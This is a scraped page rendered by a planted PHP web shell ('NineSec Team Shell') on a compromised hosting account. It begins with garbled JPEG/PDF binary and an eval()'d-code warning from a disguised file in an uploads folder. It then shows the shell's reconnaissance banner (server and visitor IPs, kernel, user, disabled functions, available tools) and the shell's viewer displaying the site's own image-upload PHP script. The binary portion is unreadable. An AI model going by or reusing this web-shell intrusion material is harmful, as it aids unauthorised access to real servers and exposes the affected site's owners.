JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 C  %PDF-1.3 % 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream x\mo7 a?Hyi{$E(i?ckrAvEzFHI|H?{|Z|X|Ň77?Oݞ__lOя77wx'?Ű8I] gQB2za]l|ɇ՟?} " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress
Warning: file_get_contents(test.txt): Failed to open stream: No such file or directory in /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/1770357389_0_197006009.php(44) : eval()'d code on line 6
NineSec Team Shell
NineSec Team Shell
Server IP : 82.25.113.252  /  Your IP : 216.73.216.172
Web Server : LiteSpeed
System : Linux fr-int-web2058.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u178500310 ( 178500310)
PHP Version : 8.2.29
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u178500310/domains/pinkrosesentertainment.com/public_html/


Current File : /home/u178500310/domains/pinkrosesentertainment.com/public_html/submit_banner.php
<?php
// Database connection
include 'db_connect.php';

// Destination for stored banners; a relative path, so it resolves against the
// directory the request runs in.
$uploadDir = "uploads/";

// Create the directory (and any missing parents) on first use. If it is absent
// and cannot be created, answer with a JSON error and stop.
if (!is_dir($uploadDir) && !mkdir($uploadDir, 0755, true)) {
    echo json_encode(['success' => false, 'message' => 'Failed to create upload directory']);
    exit;
}

// Upload policy handed to uploadFile(): accepted MIME types and the size
// ceiling in bytes (2 MB).
$allowedTypes = ['image/jpeg', 'image/png', 'image/gif', 'image/webp'];
$maxFileSize = 2097152;

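/**
 * Validate one uploaded image from $_FILES and store it under $uploadDir.
 *
 * The stored file name is built entirely on the server: a random base name plus
 * an extension chosen from the MIME type detected in the file's content. The
 * client-supplied name ($_FILES[...]['name']) is never used. Taking the
 * extension from that name would let a file whose leading bytes look like an
 * image be saved as ".php" (or any other handler-mapped extension) inside a
 * web-served directory, because content sniffing says nothing about the name.
 *
 * Content sniffing only inspects the start of the file, so it does not prove
 * the rest of the file is harmless. The upload directory should additionally
 * be configured at the web server so that nothing in it is executed as script.
 *
 * @param string $fileInput    Key of the upload in $_FILES (the form field name).
 * @param string $uploadDir    Destination directory, including the trailing slash.
 * @param array  $allowedTypes MIME types to accept. A type that has no entry in
 *                             the extension map below is rejected even if listed.
 * @param int    $maxFileSize  Largest accepted size in bytes.
 *
 * @return array ['success' => true, 'path' => string] on success, otherwise
 *               ['success' => false, 'message' => string].
 */
function uploadFile($fileInput, $uploadDir, $allowedTypes, $maxFileSize) {
    // Server-side mapping from detected content type to stored extension.
    $extensionByMime = [
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
        'image/webp' => 'webp',
    ];

    if (!isset($_FILES[$fileInput])) {
        return ['success' => false, 'message' => 'No file uploaded'];
    }

    $file = $_FILES[$fileInput];

    // A field submitted as "name[]" produces arrays for every sub-key. This
    // function handles exactly one file, so refuse that shape instead of
    // passing arrays to finfo_file() and move_uploaded_file().
    if (!is_array($file) || !is_int($file['error'] ?? null) || !is_string($file['tmp_name'] ?? null)) {
        return ['success' => false, 'message' => 'Invalid upload request'];
    }

    if ($file['error'] === UPLOAD_ERR_NO_FILE) {
        return ['success' => false, 'message' => 'No file uploaded'];
    }

    // Any other non-OK code (size limits, partial upload, ...) is reported as is.
    if ($file['error'] !== UPLOAD_ERR_OK) {
        return ['success' => false, 'message' => 'Upload error: ' . $file['error']];
    }

    // Detect the type from the file's bytes; the client-sent 'type' is ignored.
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    if ($finfo === false) {
        return ['success' => false, 'message' => 'Unable to determine file type'];
    }
    $mime = finfo_file($finfo, $file['tmp_name']);
    finfo_close($finfo);

    // Strict comparison so a failed detection (false) can never match; the type
    // must also have a known extension, otherwise the upload is refused.
    if (!is_string($mime) || !in_array($mime, $allowedTypes, true) || !isset($extensionByMime[$mime])) {
        return ['success' => false, 'message' => 'Invalid file type. Only JPG, PNG, GIF, and WEBP are allowed.'];
    }

    // Validate file size
    if ($file['size'] > $maxFileSize) {
        return ['success' => false, 'message' => 'File too large (max 2MB)'];
    }

    // Unguessable base name (uniqid() is derived from the clock) and an
    // extension that depends only on the detected content type.
    $filename = bin2hex(random_bytes(16)) . '.' . $extensionByMime[$mime];
    $targetPath = $uploadDir . $filename;

    // move_uploaded_file() itself refuses paths that are not genuine HTTP uploads.
    if (move_uploaded_file($file['tmp_name'], $targetPath)) {
        return ['success' => true, 'path' => $targetPath];
    }

    return ['success' => false, 'message' => 'Failed to move uploaded file'];
}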

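// Default answer, used when the request carried no files at all.
$response = ['success' => false, 'message' => 'No files were uploaded'];

// NOTE(review): no session, authorization or CSRF check is visible in this file
// before uploads are accepted and the banners table is modified. Presumably
// that is enforced elsewhere (db_connect.php or the web server); confirm.

try {
    // Map each banners column to the form field that feeds it. The column names
    // are fixed here and never come from the request, which is what makes it
    // safe to splice them into the UPDATE statement further down.
    $uploads = [
        'main_banner' => uploadFile('file1', $uploadDir, $allowedTypes, $maxFileSize),
        'secondary_banner' => uploadFile('file2', $uploadDir, $allowedTypes, $maxFileSize),
        'event_banner' => uploadFile('file3', $uploadDir, $allowedTypes, $maxFileSize)
    ];

    // Collect the stored path of every upload that succeeded, keyed by column.
    $uploadedFiles = [];
    foreach ($uploads as $key => $upload) {
        if ($upload['success']) {
            $uploadedFiles[$key] = $upload['path'];
        }
    }

    if (!empty($uploadedFiles)) {
        // The table is treated as holding one "current" row: the newest by id.
        $checkSql = "SELECT id, main_banner, secondary_banner, event_banner FROM banners ORDER BY id DESC LIMIT 1";
        $result = $conn->query($checkSql);

        if ($result && $result->num_rows > 0) {
            // Update existing record
            $row = $result->fetch_assoc();

            // Build "col = ?" fragments and the matching bind list for only
            // those columns that received a new file.
            $updateFields = [];
            $params = [];
            $types = '';
            $replacedFiles = [];

            foreach ($uploadedFiles as $key => $path) {
                $updateFields[] = "$key = ?";
                $params[] = $path;
                $types .= 's';

                // Remember the file being replaced; it is deleted only after
                // the row has been updated successfully.
                if (!empty($row[$key])) {
                    $replacedFiles[] = $row[$key];
                }
            }

            $params[] = $row['id'];
            $types .= 'i';

            $updateSql = "UPDATE banners SET " . implode(', ', $updateFields) . " WHERE id = ?";
            $stmt = $conn->prepare($updateSql);

            if ($stmt) {
                $stmt->bind_param($types, ...$params);

                if ($stmt->execute()) {
                    $response = ['success' => true, 'message' => 'Banners updated successfully'];

                    // Delete replaced files, but only regular files that resolve
                    // to a location inside the upload directory. The path comes
                    // from the database, so an unexpected value there must not
                    // be able to remove files elsewhere on the account.
                    $uploadRoot = realpath($uploadDir);
                    if ($uploadRoot !== false) {
                        $rootPrefix = rtrim($uploadRoot, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
                        foreach ($replacedFiles as $oldPath) {
                            $resolved = realpath($oldPath);
                            if ($resolved !== false
                                && is_file($resolved)
                                && strncmp($resolved, $rootPrefix, strlen($rootPrefix)) === 0
                            ) {
                                @unlink($resolved);
                            }
                        }
                    }
                } else {
                    // Driver error text stays in the server log, not the response.
                    error_log('submit_banner: banner update failed: ' . $stmt->error);
                    $response = ['success' => false, 'message' => 'Database update failed'];
                }
                $stmt->close();
            } else {
                error_log('submit_banner: prepare failed: ' . $conn->error);
                $response = ['success' => false, 'message' => 'Database prepare failed'];
            }
        } else {
            // Insert new record with only the uploaded files (others will be NULL)
            $insertSql = "INSERT INTO banners (main_banner, secondary_banner, event_banner) VALUES (?, ?, ?)";
            $stmt = $conn->prepare($insertSql);

            if ($stmt) {
                $mainBanner = $uploadedFiles['main_banner'] ?? null;
                $secondaryBanner = $uploadedFiles['secondary_banner'] ?? null;
                $eventBanner = $uploadedFiles['event_banner'] ?? null;

                $stmt->bind_param("sss", $mainBanner, $secondaryBanner, $eventBanner);

                if ($stmt->execute()) {
                    $response = ['success' => true, 'message' => 'Banners uploaded successfully'];
                } else {
                    error_log('submit_banner: banner insert failed: ' . $stmt->error);
                    $response = ['success' => false, 'message' => 'Database insert failed'];
                }
                $stmt->close();
            } else {
                error_log('submit_banner: prepare failed: ' . $conn->error);
                $response = ['success' => false, 'message' => 'Database prepare failed'];
            }
        }
    } else {
        // Nothing was stored: report every real failure, skipping fields that
        // were simply left empty.
        $errorMessages = [];
        foreach ($uploads as $upload) {
            if (!$upload['success'] && $upload['message'] !== 'No file uploaded') {
                $errorMessages[] = $upload['message'];
            }
        }

        $response = [
            'success' => false,
            'message' => empty($errorMessages) ? 'No files were uploaded' : implode(', ', $errorMessages)
        ];
    }
} catch (Exception $e) {
    // Exception messages can carry SQL text or file system paths; log them
    // server-side and return a generic message to the client.
    error_log('submit_banner: ' . $e->getMessage());
    $response = ['success' => false, 'message' => 'An error occurred'];
}

header('Content-Type: application/json');
echo json_encode($response);

$conn->close();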
?>
